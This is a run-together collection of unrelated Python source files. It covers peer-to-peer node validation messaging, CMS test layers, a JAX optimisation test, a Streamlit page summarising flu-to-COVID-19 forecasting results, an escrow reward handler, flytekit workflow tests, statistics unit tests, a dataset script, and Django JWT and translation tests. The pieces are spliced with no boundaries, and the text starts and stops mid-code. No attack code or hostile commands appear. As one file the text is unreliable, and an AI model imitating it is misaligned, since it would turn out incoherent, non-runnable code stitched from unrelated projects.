self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass return if self.other_convo_id is None: self.other_convo_id = msg[1][1] # msg = ['n', [your convo id, other convo id], main_msg] self.convo_id = [self.other_convo_id, self.local_convo_id] if msg[-1] == self.send_tx_msg: # msg[-1] == "snd" self.speak(self.main_msg) elif msg == self.not_compatible_msg: # todo: find a way to note nodes not running compatible software for now end convo self.end_convo = True self.end_convo_reason = msg[-1] try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass elif isinstance(msg[-1], dict): # peer node running compatible software, dict is to decide if to snd addr msg_dict = msg[-1] if isinstance(msg_dict["2"], list): # addresses of peer node self.admin_inst.fl.update_addresses(address_list=msg_dict["2"]) if msg_dict["1"] is True: # other node wants tocal address list self.speak(self.addr_list) else: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass def speaker(self, msg): self.propagator_inst.reactor_instance.callFromThread( self.protocol.transport.write, json.dumps([self.prop_type, self.convo_id, msg]).encode() ) class NodeValidatorReceiver: def __init__(self, protocol, convo_id, propagatorInst, msg_sorter_inst: NetworkMessageSorter, admin_instance, conn_node_validator, known_addr): """ FIRST message should be a string with message[1:] == admin ID, this is then checked to verify that admin not blacklisted. 
A "snd" message ie self.send_tx_msg is sent. SECOND message should then be a dictionary with three keys "1","2", "3". key "1" is == peer_software_hash_list AND peer_software_hash_list[-1] == combined_hash key "2" is the ip address of the node.. key "3" is an int number of known addresses. This second message is passed to ConnectNodeValidator. the validator checks to make sure the peer is running a compatible software and also stores/updates the ip address of the node, if not already stored/updated if the peer node is NOT running a compatible software an "ntc" message ie self.not_compatible_msg is sent if peer node IS running compatible software: If the local and peer node has more than 3 ip addresses of nodes, then an end message is sent Otherwise a dictionary is sent. In this dictionary '1': True if the local node needs addresses else False '2': [list of addresses] if the peer node has 3 or less addresses else None THIRD message is received only if the local node requested for peer's address list. Third message is a list of ip addresses. length of list is <= 20. Once this is received, local node stores these addresses in address list. :param protocol: :param convo_id: :param propagatorInst: :param admin_instance: :param conn_node_validator: """ # TODO: after storing new addresses, find a way to trigger connection in which node can be connected to at # TODO: least 4 nodes IF not already connected self.known_addr = known_addr self.msg_sorter_inst = msg_sorter_inst self.connected_node_validator = conn_node_validator self.not_compatible_msg = "ntc" self.need_addr_msg = "ndr" self.need_to_receive_addr = None self.admin_instance = admin_instance self.last_msg = 'end' self.verified_msg = 'ver' self.rejected_msg = 'rej' self.send_tx_msg = 'snd' self.prop_type = 'n' self.local_convo_id = convo_id[0] self.other_convo_id = convo_id[1] # when receiving from other, the other's local id is added here self.convo_id = [self.other_convo_id, self.local_convo_id] self.end_convo = False self.received_first_msg = False self.received_tx_msg = False self.main_message = None self.propagator_inst = propagatorInst self.protocol = protocol self.end_convo_reason = None def listen(self, msg): print(f"in Networkmessagesorter.py, listen, networkmessagereceiver msg\n" f"{msg}\n") if self.end_convo is False: if isinstance(msg[-1], str) and msg[-1] in {self.verified_msg, self.rejected_msg, self.last_msg}: self.end_convo = True self.end_convo_reason = msg[-1] try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass elif self.received_first_msg is False and isinstance(msg[-1], str): # "e{adminId}" ie. 
"e" if msg[-1][1:] in self.admin_instance.fl.get_blacklisted_admin(): self.speak(rsp=False) else: self.speak() # expecting dict of hashes/ second message elif self.received_tx_msg is False and isinstance(msg[-1], dict): try: rsp = self.connected_node_validator( peer_node_info_dict=msg[-1], wallet_pubkey=None, q_object=None, admin_inst=self.admin_instance ).check_validity() except KeyError: # wrong tx message sent (or invalid format maybe using different version) rsp = False if rsp is True: known_addr_peer = msg[-1]["3"] known_addr_local = len(self.known_addr) if known_addr_peer > 3 and known_addr_local > 3: # no need to send self.speak(rsp=self.last_msg) else: # todo: minimize to only sending 7 addresses rsp_dict = dict() rsp_dict['1'] = self.need_to_receive_addr = known_addr_local <= 3 try: rsp_dict['2'] = list(self.known_addr) if known_addr_local <= 3 else {} except TypeError: rsp_dict['2'] = {} self.speak(rsp_dict) else: # rsp is False / non compatible software being run by peer node self.speak(self.not_compatible_msg) elif self.need_to_receive_addr is True: if isinstance(msg[-1], list): self.admin_instance.fl.update_addresses(msg[-1]) self.speak(self.last_msg) else: print("in NetworkMessageSorter, NodeValidatorReceiver, No option available") def speak(self, rsp=None): if self.end_convo is False: if self.received_first_msg is False: self.received_first_msg = True msg = self.verified_msg if rsp is True else(self.rejected_msg if rsp is False else self.send_tx_msg) self.end_convo = True if (rsp is True) or (rsp is False) else False if self.end_convo is True: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass self.speaker(msg=msg) elif self.received_tx_msg is False: self.received_tx_msg = True if rsp == self.not_compatible_msg or isinstance(rsp, dict): if rsp == self.not_compatible_msg: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass self.end_convo = True self.end_convo_reason = self.not_compatible_msg else: # its a dict, and therefore compatible if self.need_to_receive_addr is False: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass else: pass self.speaker(msg=rsp) elif rsp == self.last_msg: # peer running compatible software self.end_convo = True try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass self.end_convo = True self.end_convo_reason = self.last_msg self.speaker(msg=rsp) def speaker(self, msg): self.propagator_inst.reactor_instance.callFromThread( self.protocol.transport.write, json.dumps([self.prop_type, self.convo_id, msg]).encode() ) # coding: utf-8 from zeit.cms.repository.unknown import PersistentUnknownResource from zeit.content.dynamicfolder.folder import RepositoryDynamicFolder import pkg_resources import plone.testing import transaction import zeit.cms.repository.folder import zeit.cms.repository.interfaces import zeit.cms.testing import zeit.content.cp.testing import zope.component ZCML_LAYER = zeit.cms.testing.ZCMLLayer(bases=( zeit.content.cp.testing.CONFIG_LAYER,)) ZOPE_LAYER = 
zeit.cms.testing.ZopeLayer(bases=(ZCML_LAYER,)) class DynamicLayer(plone.testing.Layer): defaultBases = (ZOPE_LAYER,) def __init__(self, path, files): super().__init__() self.path = path self.files = files def testSetUp(self): with zeit.cms.testing.site(self['zodbApp']): repository = zope.component.getUtility( zeit.cms.repository.interfaces.IRepository) folder = zeit.cms.repository.folder.Folder() repository['data'] = folder for name in self.files: folder[name] = PersistentUnknownResource( data=pkg_resources.resource_string( __name__, '{}{}'.format( self.path, name)).decode( 'latin-1')) dynamic = RepositoryDynamicFolder() dynamic.config_file = folder['config.xml'] repository['dynamicfolder'] = dynamic transaction.commit() LAYER = DynamicLayer(path='tests/fixtures/dynamic-centerpages/', files=[ 'config.xml', 'tags.xml', 'template.xml']) WSGI_LAYER = zeit.cms.testing.WSGILayer(bases=(LAYER,)) class FunctionalTestCase(zeit.cms.testing.FunctionalTestCase): layer = LAYER class BrowserTestCase(zeit.cms.testing.BrowserTestCase): layer = WSGI_LAYER def wsgiBrowser(self): browser = zeit.cms.testing.Browser(self.layer['wsgi_app']) browser.login('producer', 'producerpw') browser.open('http://localhost/++skin++vivi/repository/dynamicfolder') return browser def cloneArmy(self): folder = zeit.content.dynamicfolder.interfaces.ICloneArmy( self.repository['dynamicfolder']) folder.activate = True return self.wsgiBrowser() from absl.testing import absltest from absl.testing import parameterized import numpy as onp import jax.test_util import jax.numpy as np from jax import random from jax import tree_util from jax.experimental import optimizers from jax.scipy.special import logsumexp from jax.experimental.stax import softmax from jax.config import config from fax import converge from fax import test_util from fax.constrained import make_lagrangian from fax.constrained import cga_lagrange_min from fax.constrained import cga_ecp from fax.constrained import slsqp_ecp from fax.constrained import implicit_ecp from exact_pg import policy_evaluation config.update("jax_enable_x64", True) config.update('jax_disable_jit', True) # finding reward function class CGATest(jax.test_util.JaxTestCase): # @parameterized.parameters( # {'method': implicit_ecp, # 'kwargs': {'max_iter': 1000, 'lr_func': 0.01, 'optimizer': optimizers.adam}}, # {'method': cga_ecp, 'kwargs': {'max_iter': 1000, 'lr_func': 0.15, 'lr_multipliers': 0.925}}, # {'method': slsqp_ecp, 'kwargs': {'max_iter': 1000}}, # ) def test_omd(self): # def test_omd(self, method, kwargs): true_transition = np.array([[[0.7, 0.3], [0.2, 0.8]], [[0.99, 0.01], [0.99, 0.01]]]) true_reward = np.array(([[-0.45, -0.1], [0.5, 0.5]])) temperature = 1e-2 true_discount = 0.9 initial_distribution = np.ones(2)/2 policy_expert = np.array(([[0.4, 0.6], [0.4, 0.6]])) def smooth_bellman_optimality_operator(x, params): transition, reward, discount, temperature = params return reward + discount * np.einsum('ast,t->sa', transition, temperature * logsumexp((1. / temperature) * x, axis=1)) # @jax.jit def objective(x, params): del params policy = softmax((1. 
/ temperature) * x) # [2, 2] cumulent = np.log(np.einsum('sa,ast->sat', policy, true_transition)) cumulent = np.einsum('sat,ast->sa', cumulent, true_transition) likelihood = policy_evaluation(true_transition, cumulent, true_discount, policy_expert) print("policy", policy) return initial_distribution @ likelihood # @jax.jit def equality_constraints(x, params): #reward reward_logits = params reward_hat = softmax((1./temperature)*reward_logits) params = (true_transition, reward_hat, true_discount, temperature) return smooth_bellman_optimality_operator(x, params) - x initial_values = ( np.zeros_like(true_reward), (np.zeros_like(true_reward)) ) args = {'max_iter': 1000} solution = slsqp_ecp(objective, equality_constraints, initial_values, **args) print ("solution", solution) if __name__ == "__main__": absltest.main() benlevyx/modelling-infectious-disease import streamlit as st import matplotlib.pyplot as plt import numpy as np import os import sys import pandas as pd pd.set_option('display.max_columns', None) pd.set_option('display.max_rows', None) import csv plt.rcParams.update({'font.size': 18}) import plotly.express as px # Be sure to import express from covid_flu import config def main(): st.title('Conclusion') st.write(""" #### We return to the question: can we use the flu to predict COVID-19? In our EDA, we noticed two main patterns in the flu data: **spatial** and **temporal**. As such, we attempted to exploit these patterns to see if COVID-19 might exhibit a similar-enough trend that a predictive model based on the flu data could achieve better performance than a mdoel based solely on COVID data alone. Spatial | Temporal ------- | -------- Bayesian hierarchical model | Recurrent neural networks Conditional autoregressive model (CAR) | Sequence-to-sequence models In our analyses, we found that these kinds of models were quite good at predicting the seasonal flu. We achieved very low prediction error (out of sample) for predicting seasonal flu using a seq2seq model that took advantage of the clear cyclical trends over the ten years of flu data we had. However, when it came to predicting COVID-19 by exploiting the spatiotemporal patterns in the seasonal flu, we achieved mixed results. The CAR model did not clearly outperform a simple AR(1) (autoregressive) model, which was our baseline. As well, the seq2seq models, pre-trained on flu data, did not result in plausible mid-to-long-term forecasts. Yet these COVID-19 models nonetheless revealed interesting findings that merit further exploration. For the CAR model, we found that the model consistently over-estimated the number of cases in states with higher rates of positive tests. We can tentatively interpret this to mean that, based on the spatial patterns from the flu, we would expect that states with poorer test coverage (i.e. they are not testing widely enough to see lots of negative results) actually have far more cases of COVID-19 than reported. As well, the exercise of pre-training a seq2seq model on flu and then transferring it to COVID-19 did demonstrate the power of this technique, as the best RNN model we tested for COVID-19 was the one that was trained on the flu and then fine-tuned on COVID-19. ## Next steps Much of the work done in this project has been preliminary and merits further exploration. 
Here are some areas that we hope to pursue in the future: * Tuning the parameters of both the hierarchical Bayesian model and the CAR model to ensure convergence * Exploring different RNN architectures that can better take into account domain knowledge about COVID-19, such as the parameter estimates from the literature * Trying other pre-trained models or external datasets that might be better suited for transfer learning with COVID-19 Thank you for your time! We hope you enjoyed reading these results as much as we enjoyed conducting this project! Stay safe and stay healthy! """)import logging import time from contracts_lib_py.keeper import Keeper from contracts_lib_py.utils import process_fulfill_condition from contracts_lib_py.web3_provider import Web3Provider logger = logging.getLogger(__name__) def fulfill_escrow_reward_condition(event, agreement_id, service_agreement, price, consumer_address, publisher_account, condition_ids, escrow_condition_id): """ :param event: AttributeDict with the event data. :param agreement_id: id of the agreement, hex str :param service_agreement: ServiceAgreement instance :param price: Asset price, int :param consumer_address: ethereum account address of consumer, hex str :param publisher_account: Account instance of the publisher :param condition_ids: is a list of bytes32 content-addressed Condition IDs, bytes32 :param escrow_condition_id: hex str the id of escrow reward condition at this `agreement_id` :return: """ if not event: logger.warning(f'`fulfill_escrow_reward_condition` got empty event: ' f'event listener timed out.') return keeper = Keeper.get_instance() if keeper.condition_manager.get_condition_state(escrow_condition_id) > 1: logger.debug( f'escrow reward condition already fulfilled/aborted: ' f'agreementId={agreement_id}, escrow reward conditionId={escrow_condition_id}' ) return logger.debug(f"release reward (agreement {agreement_id}) after event {event}.") access_id, lock_id = condition_ids[:2] logger.debug(f'fulfill_escrow_reward_condition: ' f'agreementId={agreement_id}' f'price={price}, {type(price)}' f'consumer={consumer_address},' f'publisher={publisher_account.address},' f'conditionIds={condition_ids}') assert price == service_agreement.get_price(), 'price mismatch.' 
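# Descriptive note on the steps that follow: the price is further validated to be an
# int, the handler then pauses briefly, resolves the agreement's DID owner, assembles
# the escrow reward fulfill arguments, and hands them to process_fulfill_condition to
# submit the fulfillment for escrow_condition_id.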
assert isinstance(price, int), f'price expected to be int type, got type "{type(price)}"' time.sleep(5) keeper = Keeper.get_instance() did_owner = keeper.agreement_manager.get_agreement_did_owner(agreement_id) args = ( agreement_id, price, Web3Provider.get_web3().toChecksumAddress(did_owner), consumer_address, lock_id, access_id, publisher_account ) process_fulfill_condition(args, keeper.escrow_reward_condition, escrow_condition_id, logger, keeper, 10) fulfillEscrowRewardCondition = fulfill_escrow_reward_condition from six import moves as _six_moves from flytekit.common.tasks import sdk_dynamic as _sdk_dynamic from flytekit.common.tasks import sdk_runnable as _sdk_runnable from flytekit.sdk.tasks import dynamic_task, inputs, outputs, python_task from flytekit.sdk.types import Types from flytekit.sdk.workflow import Input, Output, workflow @inputs(in1=Types.Integer) @outputs(out_str=[Types.String], out_ints=[[Types.Integer]]) @dynamic_task def sample_batch_task(wf_params, in1, out_str, out_ints): res = ["I'm the first result"] for i in _six_moves.range(0, in1): task = sub_task(in1=i) yield task res.append(task.outputs.out1) res.append("I'm after each sub-task result") res.append("I'm the last result") res2 = [] for i in _six_moves.range(0, in1): task = int_sub_task(in1=i) yield task res2.append(task.outputs.out1) # Nested batch tasks task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) out_str.set(res) out_ints.set(res2) @outputs(out_ints=[Types.Integer]) @dynamic_task def sample_batch_task_sq(wf_params, out_ints): res2 = [] for i in _six_moves.range(0, 3): task = sq_sub_task(in1=i) yield task res2.append(task.outputs.out1) out_ints.set(res2) @outputs(out_str=[Types.String], out_ints=[[Types.Integer]]) @dynamic_task def sample_batch_task_no_inputs(wf_params, out_str, out_ints): res = ["I'm the first result"] for i in _six_moves.range(0, 3): task = sub_task(in1=i) yield task res.append(task.outputs.out1) res.append("I'm after each sub-task result") res.append("I'm the last result") res2 = [] for i in _six_moves.range(0, 3): task = int_sub_task(in1=i) yield task res2.append(task.outputs.out1) # Nested batch tasks task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) task = sample_batch_task_sq() yield task res2.append(task.outputs.out_ints) out_str.set(res) out_ints.set(res2) @inputs(in1=Types.Integer) @outputs(out1=Types.String) @python_task def sub_task(wf_params, in1, out1): out1.set("hello {}".format(in1)) @inputs(in1=Types.Integer) @outputs(out1=[Types.Integer]) @python_task def int_sub_task(wf_params, in1, out1): wf_params.stats.incr("int_sub_task") out1.set([in1, in1 * 2, in1 * 3]) @inputs(in1=Types.Integer) @outputs(out1=Types.Integer) @python_task def sq_sub_task(wf_params, in1, out1): out1.set(in1 * in1) @inputs(in1=Types.Integer) @outputs(out_str=[Types.String]) @dynamic_task def no_future_batch_task(wf_params, in1, out_str): out_str.set(["res1", "res2"]) def manual_assign_name(): pass @inputs(task_input_num=Types.Integer) @outputs(out=Types.Integer) @dynamic_task def dynamic_wf_task(wf_params, task_input_num, out): wf_params.logging.info("Running inner task... 
yielding a code generated sub workflow") input_a = Input(Types.Integer, help="Tell me something") node1 = sq_sub_task(in1=input_a) MyUnregisteredWorkflow = workflow( inputs={"a": input_a}, outputs={"ooo": Output(node1.outputs.out1, sdk_type=Types.Integer, help="This is an integer output")}, nodes={"node_one": node1}, ) setattr(MyUnregisteredWorkflow, "auto_assign_name", manual_assign_name) MyUnregisteredWorkflow._platform_valid_name = "unregistered" unregistered_workflow_execution = MyUnregisteredWorkflow(a=task_input_num) out.set(unregistered_workflow_execution.outputs.ooo) def test_batch_task(): assert isinstance(sample_batch_task, _sdk_runnable.SdkRunnableTask) assert isinstance(sample_batch_task, _sdk_dynamic.SdkDynamicTask) assert isinstance(sample_batch_task, _sdk_dynamic.SdkDynamicTaskMixin) expected = { "out_str": [ "I'm the first result", "hello 0", "I'm after each sub-task result", "hello 1", "I'm after each sub-task result", "hello 2", "I'm after each sub-task result", "I'm the last result", ], "out_ints": [[0, 0, 0], [1, 2, 3], [2, 4, 6], [0, 1, 4], [0, 1, 4]], } res = sample_batch_task.unit_test(in1=3) assert expected == res def test_no_future_batch_task(): expected = {"out_str": ["res1", "res2"]} res = no_future_batch_task.unit_test(in1=3) assert expected == res def test_dynamic_workflow(): res = dynamic_wf_task.unit_test(task_input_num=2) dynamic_spec = res["futures.pb"] assert len(dynamic_spec.nodes) == 1 assert len(dynamic_spec.subworkflows) == 1 assert len(dynamic_spec.tasks) == 1 @inputs(task_input_num=Types.Integer) @outputs(out=Types.Integer) @dynamic_task def nested_dynamic_wf_task(wf_params, task_input_num, out): wf_params.logging.info("Running inner task... yielding a code generated sub workflow") # Inner workflow input_a = Input(Types.Integer, help="Tell me something") node1 = sq_sub_task(in1=input_a) MyUnregisteredWorkflowInner = workflow( inputs={"a": input_a}, outputs={"ooo": Output(node1.outputs.out1, sdk_type=Types.Integer, help="This is an integer output")}, nodes={"node_one": node1}, ) setattr(MyUnregisteredWorkflowInner, "auto_assign_name", manual_assign_name) MyUnregisteredWorkflowInner._platform_valid_name = "unregistered" # Output workflow input_a = Input(Types.Integer, help="Tell me something") node1 = MyUnregisteredWorkflowInner(a=task_input_num) MyUnregisteredWorkflowOuter = workflow( inputs={"a": input_a}, outputs={"ooo": Output(node1.outputs.ooo, sdk_type=Types.Integer, help="This is an integer output")}, nodes={"node_one": node1}, ) setattr(MyUnregisteredWorkflowOuter, "auto_assign_name", manual_assign_name) MyUnregisteredWorkflowOuter._platform_valid_name = "unregistered" unregistered_workflow_execution = MyUnregisteredWorkflowOuter(a=task_input_num) out.set(unregistered_workflow_execution.outputs.ooo) def test_nested_dynamic_workflow(): res = nested_dynamic_wf_task.unit_test(task_input_num=2) dynamic_spec = res["futures.pb"] assert len(dynamic_spec.nodes) == 1 assert len(dynamic_spec.subworkflows) == 2 assert len(dynamic_spec.tasks) == 1 @inputs(task_input_num=Types.Integer) @dynamic_task def dynamic_wf_no_outputs_task(wf_params, task_input_num): wf_params.logging.info("Running inner task... 
yielding a code generated sub workflow")
    input_a = Input(Types.Integer, help="Tell me something")
    node1 = sq_sub_task(in1=input_a)
    MyUnregisteredWorkflow = workflow(inputs={"a": input_a}, outputs={}, nodes={"node_one": node1})
    setattr(MyUnregisteredWorkflow, "auto_assign_name", manual_assign_name)
    MyUnregisteredWorkflow._platform_valid_name = "unregistered"
    unregistered_workflow_execution = MyUnregisteredWorkflow(a=task_input_num)
    yield unregistered_workflow_execution


def test_dynamic_workflow_no_outputs():
    res = dynamic_wf_no_outputs_task.unit_test(task_input_num=2)
    dynamic_spec = res["futures.pb"]
    assert len(dynamic_spec.nodes) == 1
    assert len(dynamic_spec.subworkflows) == 1
    assert len(dynamic_spec.tasks) == 1


# interesting_lines.py
def interesting_lines(f):
    for line in f:
        if line.startswith("#"):  # skip comment lines
            continue
        line = line.strip()
        if not line:  # skip empty lines
            continue
        yield line


with open('myconfig.ini') as f:
    for line in interesting_lines(f):
        print(line)


ezorigo/lambdata
"""
This is the test file for my stats tools functions.
Run it in a terminal with: python stats_tools_test.py
Optionally, enable verbose mode by adding -v to that command.
"""
import unittest

import numpy as np

from stats_tools import mean, mode, median, variance, stddev, coeffvar

list1 = [1, 1, 1, 2, 3, 3, 6, 7, 8, 9]


class StatsTests(unittest.TestCase):
    """Test stats_tools functions."""

    def test_mean(self):
        """test mean()"""
        self.assertEqual(float(mean(list1)), np.mean(list1))

    def test_mode(self):
        """test mode()"""
        self.assertEqual(mode(list1), 1)

    def test_median(self):
        """test median()"""
        self.assertEqual(median(list1), np.median(list1))

    def test_variance(self):
        """test variance() and variance(sample=False)"""
        self.assertEqual(variance(list1, sample=False), np.var(list1))
        self.assertEqual(variance(list1), np.var(list1, ddof=1))

    def test_stddev(self):
        """test stddev() and stddev(sample=False)"""
        self.assertEqual(stddev(list1, sample=False), np.std(list1))
        self.assertEqual(stddev(list1), np.std(list1, ddof=1))

    def test_coeffvar(self):
        """test coeffvar() and coeffvar(sample=False)"""
        self.assertEqual(coeffvar(list1, sample=False), np.std(list1) / np.mean(list1))
        self.assertEqual(coeffvar(list1), np.std(list1, ddof=1) / np.mean(list1))


if __name__ == '__main__':
    unittest.main()


#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue May 2 20:07:35 2017

@author: belter
"""
import scipy.io  # loadmat lives in the scipy.io subpackage, which must be imported explicitly
import json
import os
from collections import defaultdict

dataset = 'flickr8k'  # note: this name is overwritten by the JSON load below
dataset_root = r'/media/sf_vm_share_folder/neuraltalk/data/flickr8k'
features_path = os.path.join(dataset_root, 'vgg_feats.mat')
dataset_path = os.path.join(dataset_root, 'dataset.json')
features_struct = scipy.io.loadmat(features_path)
dataset = json.load(open(dataset_path, 'r'))
split = defaultdict(list)
for img in dataset['images']:
    split[img['split']].append(img)
with open(os.path.join(dataset_root, 'dataset_2.json'), 'w') as file_handle:
    file_handle.write(json.dumps(dataset, indent=2))
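# ---------------------------------------------------------------------------
# Hypothetical sketch (not the ezorigo/lambdata stats_tools implementation):
# the StatsTests above pin down the expected semantics -- variance()/stddev()
# default to the sample definitions (ddof=1) and accept sample=False for the
# population versions, while coeffvar() is the standard deviation divided by
# the mean. A minimal set of helpers consistent with those assertions could
# look like the following:
import numpy as _np


def mean(data):
    # arithmetic mean
    return _np.mean(data)


def median(data):
    return _np.median(data)


def mode(data):
    # smallest most-frequent value (consistent with mode(list1) == 1 above)
    values, counts = _np.unique(data, return_counts=True)
    return values[_np.argmax(counts)]


def variance(data, sample=True):
    # ddof=1 gives the unbiased sample variance, ddof=0 the population variance
    return _np.var(data, ddof=1 if sample else 0)


def stddev(data, sample=True):
    return _np.std(data, ddof=1 if sample else 0)


def coeffvar(data, sample=True):
    # coefficient of variation: standard deviation relative to the mean
    return stddev(data, sample=sample) / mean(data)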
tests/refresh_token/test_admin.py
from django.contrib.admin import site

from graphql_jwt.refresh_token import admin
from graphql_jwt.refresh_token.utils import get_refresh_token_model
from graphql_jwt.shortcuts import create_refresh_token

from ..decorators import skipif_django_version
from ..testcases import TestCase


class AdminTestCase(TestCase):

    def setUp(self):
        super(AdminTestCase, self).setUp()
        RefreshToken = get_refresh_token_model()
        self.refresh_token = create_refresh_token(self.user)
        self.refresh_token_admin = admin.RefreshTokenAdmin(RefreshToken, site)


class AdminTests(AdminTestCase):

    def test_revoke(self):
        request = self.request_factory.get('/')
        qs = self.refresh_token_admin.get_queryset(request)

        self.refresh_token_admin.revoke(request, qs)
        self.refresh_token.refresh_from_db()

        self.assertIsNotNone(self.refresh_token.revoked)

    def test_is_expired(self):
        is_expired = self.refresh_token_admin.is_expired(self.refresh_token)
        self.assertFalse(is_expired)


class FiltersTests(AdminTestCase):

    def filter_queryset(self, **kwargs):
        request = self.request_factory.get('/', kwargs)
        request.user = self.user
        changelist = self.refresh_token_admin.get_changelist_instance(request)
        return changelist.get_queryset(request)

    @skipif_django_version('2.0')
    def test_revoked(self):
        qs = self.filter_queryset(revoked='yes')
        self.assertFalse(qs)

    @skipif_django_version('2.0')
    def test_not_revoked(self):
        qs = self.filter_queryset(revoked='no')
        self.assertTrue(qs)

    @skipif_django_version('2.0')
    def test_expired(self):
        qs = self.filter_queryset(expired='yes')
        self.assertFalse(qs)

    @skipif_django_version('2.0')
    def test_not_expired(self):
        qs = self.filter_queryset(expired='no')
        self.assertTrue(qs)
10-100 # 
coding=utf-8 import django from django.contrib.auth.models import User from django.core.urlresolvers import reverse from django.db import IntegrityError from django.test import TestCase from django.utils import translation from linguo.tests.forms import BarForm, BarFormWithFieldsSpecified, \ BarFormWithFieldsExcluded, MultilingualBarFormAllFields from linguo.tests.models import Foo, FooRel, Moo, Bar, BarRel, Moe, Gem, \ FooCategory, Hop, Ord, Doc, Lan class LinguoTests(TestCase): def setUp(self): self.old_lang = translation.get_language() translation.activate('en') def tearDown(self): translation.activate(self.old_lang) class Tests(LinguoTests): def testOrderingOfFieldsWithinModel(self): expected = ['id', 'price', 'name', 'name_fr'] for i in range(len(Foo._meta.fields)): self.assertEqual(Foo._meta.fields[i].name, expected[i]) def testCreation(self): translation.activate('en') obj = Foo.objects.create(name='Foo', price=10) obj = Foo.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) translation.activate('fr') Foo.objects.create(name='FrenchName', price=15) translation.activate('en') self.assertEquals(Foo.objects.count(), 2) def testTranslate(self): """ We should be able to translate fields on the object. """ obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') obj.save() # Refresh from db obj = Foo.objects.get(id=obj.id) self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(Foo.objects.count(), 1) def testDelayedCreation(self): obj = Foo() obj.name = 'Foo' obj.price = 10 translation.activate('fr') obj.name = 'FooFr' obj.save() translation.activate('en') obj = Foo.objects.get(pk=obj.pk) self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(obj.price, 10) def testMultipleTransFields(self): obj = Hop.objects.create(name='hop', description='desc', price=11) obj.translate(name='hop_fr', description='desc_fr', language='fr') self.assertEquals(obj.name, 'hop') self.assertEquals(obj.description, 'desc') self.assertEquals(obj.price, 11) translation.activate('fr') self.assertEquals(obj.name, 'hop_fr') self.assertEquals(obj.description, 'desc_fr') self.assertEquals(obj.price, 11) def testMultipleTransFieldsButNotSettingOneDuringCreation(self): obj = Hop.objects.create(name='hop', price=11) self.assertEquals(obj.name, 'hop') self.assertEquals(obj.price, 11) def testSwitchingActiveLanguageSetsValuesOnTranslatedFields(self): obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') translation.activate('fr') self.assertEquals(obj.name, 'FooFr') obj.name = 'NewFooFr' translation.activate('en') self.assertEquals(obj.name, 'Foo') obj.save() # Refresh from db obj = Foo.objects.get(id=obj.id) self.assertEquals(obj.name, 'Foo') translation.activate('fr') self.assertEquals(obj.name, 'NewFooFr') def testCreateTranslationWithNewValueForNonTransField(self): """ That value of non-trans fields should be the same for all translations. 
""" obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', price=20, language='fr') translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(obj.price, 20) translation.activate('en') self.assertEquals(obj.price, 20) # Ensure no other fields were changed self.assertEquals(obj.name, 'Foo') def testQuerysetUpdate(self): obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') obj.save() obj2 = Foo.objects.create(name='Foo2', price=13) obj2.translate(name='Foo2Fr', language='fr') obj2.save() qs = Foo.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewFoo') # Refresh objects from db obj = Foo.objects.get(pk=obj.pk) obj2 = Foo.objects.get(pk=obj2.pk) self.assertEquals(obj.price, 10) self.assertEquals(obj.name, 'NewFoo') self.assertEquals(obj2.price, 13) self.assertEquals(obj2.name, 'NewFoo') translation.activate('fr') self.assertEquals(obj.name, 'FooFr') self.assertEquals(obj.price, 10) self.assertEquals(obj2.name, 'Foo2Fr') self.assertEquals(obj2.price, 13) def testQuerysetUpdateInOtherLanguageSetsValuesOnOtherLanguageOnly(self): obj = Foo.objects.create(name='Foo', price=10) obj.translate(name='FooFr', language='fr') obj.save() obj2 = Foo.objects.create(name='Foo2', price=13) obj2.translate(name='Foo2Fr', language='fr') obj2.save() translation.activate('fr') qs = Foo.objects.all() self.assertEquals(qs.count(), 2) qs.update(name='NewFooFr') # Refresh objects from db obj = Foo.objects.get(pk=obj.pk) obj2 = Foo.objects.get(pk=obj2.pk) self.assertEquals(obj.price, 10) self.assertEquals(obj.name, 'NewFooFr') self.assertEquals(obj2.price, 13) self.assertEquals(obj2.name, 'NewFooFr') translation.activate('en') self.assertEquals(obj.name, 'Foo') self.assertEquals(obj.price, 10) self.assertEquals(obj2.name, 'Foo2') self.assertEquals(obj2.price, 13) def testUniqueTogetherUsingTransFields(self): Foo.objects.create(name='Foo', price=10) try: # name, price are unique together Foo.objects.create(name='Foo', price=10) except IntegrityError: pass else: self.fail() def testFilteringOnTransField(self): obj = Foo.objects.create(name='English Foo', price=10) obj.translate(name='French Foo', language='fr') obj.save() qs = Foo.objects.filter(name="English Foo") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = Foo.objects.filter(name__startswith="English") self.assertEquals(qs.count(), 1) self.assertEquals(qs[0], obj) qs = 